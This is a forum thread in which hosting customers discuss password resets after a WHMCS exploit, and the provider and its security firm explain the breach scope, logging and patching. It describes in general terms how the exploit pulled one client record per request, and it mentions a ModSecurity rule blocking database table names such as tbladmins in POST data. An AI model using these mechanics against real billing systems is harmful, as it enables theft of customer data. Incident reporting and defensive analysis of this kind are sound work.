New on LowEndTalk? Please Register and read our Community Rules.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
Comments
Mine is not reset, didn't get any email/update about the exploit either.
I got it too. It's most likely precautionary measure.
Oh fun.
That's where mine came from, then. Any comment from @CVPS_Chris or @jbiloh?
It's not like they have a stellar reputation. My theory on why they're the prime target for every hacking has nothing to do with scale or level of security.
It's more so Chris has a tendency to voice everything in his head to the general public. Although he thinks it's good because he's practicing free speech, in reality, it's just putting all his customers at risk.
But for the record, I'm not trying to ruin his reputation. Professionally, Chris has always responded to me with great courtesy. His actions on a message board have nothing to do with the level of service he provides with CVPS.
Nope.
I havent gotten anything but their whmcs seems to be still down
Maybe @CVPS_Chris is out #WINNING
Can you say that with any amount certainty?
Because then it's even weirder why multiple customers are getting random password reset emails.
Yes I can. I'm a (happy) current CVSP customer (6 nodes from them) and my password was not reset.
Well its concerning if its a randomized attack.
My account is affected, too.
Hope this is not anything going bad
Just saying.... it is possible only 1 set of customers was affected if it was a hack e.g. 1 product group/category. simple enough to select 1 table.
Disclaimer, I genuinely hope they were not hacked. but for those that had a PW reset perhaps compare what product you have.
I had the reset on a $12/year plan in Chicago.
I had the reset on a $12/year plan in NJ
Another client I know with $32/year plan at same location got pw reset too, so price isn't pattern.
Hey guys, making a post regarding what happened.
Our logs indicate that an individual may have ran the whmcs2.py script on our WHMCS install. One of our employees acted immediately when it came to our attention that there was a new WHMCS exploit available. After an evaluation of our logs, we have identified that about 3% of our customers were affected and we've went ahead and issued a password reset to those customers to be on the safe side. The customers that were affected were legacy customers, meaning that high percentage were inactive clients.
We issued a partial password reset towards the 3% of customers that may have been affected by this WHMCS exploit. If you received a password reset email and you did not request one, you were possibly affected, and your password was reset for your safety. While passwords are encrypted, we do not want to take any chances when it comes to the security of our customers. The only information that possibly was accessed by a third party for the 3% of customers impacted were the following: clientid, name, address, email address, encrypted password. No VPS service details or credit card information was accessed in any way.
We have already patched our WHMCS installation, and have adjusted our security settings to make it harder for exploits in general to be ran. One of the measures we took to further enhance security was doing a complete overhaul on our modsecurity rules on the billing server.
An email is currently going out to the clients that were affected explaining the situation.
Regards
Chris
How were only 3% of the people effected?
Hey Chris, can you clarify what you mean by 'Legacy customers'?
Yes, please explain how it is possible that hackers gained access to the database and only 3% of the customers listed in that database had their info compromised.
You claim that no credit card info was accessed and yet it appears that you are storing credit card info in the WHMCS database (on the credit card details tab the card type, card number, and card expiration date are all available). The WHMCS documentation also states that credit card info is stored in the WHMCS database when you use a merchant account
http://docs.whmcs.com/Payment_Gateways
You need to do more than just post the news that your billing portal was hacked on a forum. You also need to notify the NY State AG of the database breach (46 states have databreach notification laws so you may also have to notify other state AGs if you have customers in those states...here is a list of all state notification laws http://www.perkinscoie.com/statebreachchart/). You also need to notify your merchant account provider and/or Visa/Mastercard of the database breach.
FYI, since this is the 2nd time in 4 months I have had my info compromised as a result of your poor security I will also be contacting the NY State AG and Visa and Mastercard this week to notify them of the breaches.
Do tell, please.
@cvps_chris - You are full of shit my friend.
Yet again CVPS screws up and tries to cover up.
Give the guy a break. It wasn't his fault. There were lots of hosts hit by this exploit. They don't even know that they got it. Just a simple search on pastebin.com reveals lots of customer information leaked by this last WHMCS exploit.
Can't fault the provider here, they've took the necessary precautions and kudos to not just sweeping it under the carpet.
IMHO, you can't blame a provider for using WHMCS, why reinvent the wheel? And if you do, please make at at least as good, if not better.
The only sensible thing I can think of here to avoid further exploits, is that WHMCS pings a master server every few minutes, to receive notifications of any new exploits. If one exists, cease public access until an admin addresses the issue. Clients of WHMCS could have the option of having this active or not, but it seems sensible to have it on given the speed at which an exploit can be used.
One of the largest shared hosting providers experienced a server level exploit recently, but in their emails to clients they only mentioned specific sites being compromised, when in fact hundreds of their clients had been compromised due to the server they were on. It's up to providers to not bullsh*t the customer.
CVPS actually did the right thing here.
Not sure why everyone thinks it's there fault.
I think it's quite easy to see why a handful of guys think that way. Jealousy comes to mind.
Can someone give any details on the timespan between the password reset mail and the mail explaining you that your data has been stolen?
The latest exploit requires looping through each record, using a new http request each time. 3% leak rate just means they turned it off during the process. They compromised records also end up being the first users in the system given how the userids are assigned.
Because Chris has a tendency to piss people off, and that is justifiable motive to hack their WHCMS.
Not to mention it took them an entire day to inform us, but it isn't necessarily their fault for this point.
And unrelated but I don't think I'm a Legacy Customer.
That is correct. We have extensive logging set up on our infrastructure and log all of the POST data. All logs are not logged on our own servers, they are sent in real time to an offsite datacenter. That is how we were able to determine exactly how many were affected, and we wrote a script to only reset and email the 3% impacted.
I got the password reset email.. on $12/y package..
I wanted to share this here to expand more about the 3%. Below is what the security firm who setup our logging, helped us with modsecurity and so forth had to say on that matter.
"We set up logging for ChicagoVPS a couple of months ago, including writing a custom module for Apache that sends all POST data to our own log server. All kinds of logs are sent in real time, so that way we can go back and look at the logs if anything occurs."
"This is what we got in the POST data right before the server was taken into maintenance mode. For example, If you install an unsecured WHMCS and run the exploit against yourself and log the POST data, this is exactly what you would see:
"So the last client obtained was the 388th person from the top of the table. So the exploit (whmcs2.py) as written doesn't do a full dump of the database all at once, but one user at a time. Since it only pulls one user at a time, by looking at the POST data - we can tell the last user that was pulled. Then all we had to do was to walk through the same users that were affected, put their ID's in a separate file, then do a mass password reset. I confirmed the exploit by running the exploit against the server and that it was in fact pulling data one by one."
"Lucky for all of us, one of the employees found out about the exploit and put the database into maintenance mode and contacted us. I then proceed to take the billing website fully offline in case the exploit still worked in maintenance mode, even though no data would be passed back. Afterwards, we went over and updated modsecurity rules so that tbladmins, tblclients and other tables cannot be specified in a POST. If you doubt this, try submitting a ticket using one of those key words (not giving you the full list here) - and see what happens. In addition to this, we identified the people who were affected and did a mass password reset."
"Bottom line, always send your logs off to a remote server. And most exploits use http POST, so always log all the POST data. It's a good indication if somebody is trying to break in, or if they already did, to be able to assess how much damage they did and to find ways to update your security."
"I understand that the latest rash of WHMCS and SolusVM exploits have rattled many people, and I join you in wondering what those programmers are doing with our hard-earned money while allowing other people to exploit our providers and end up affecting us as the customer. But do not confuse fact with fiction, as there are companies that are actually trying to improve and do better."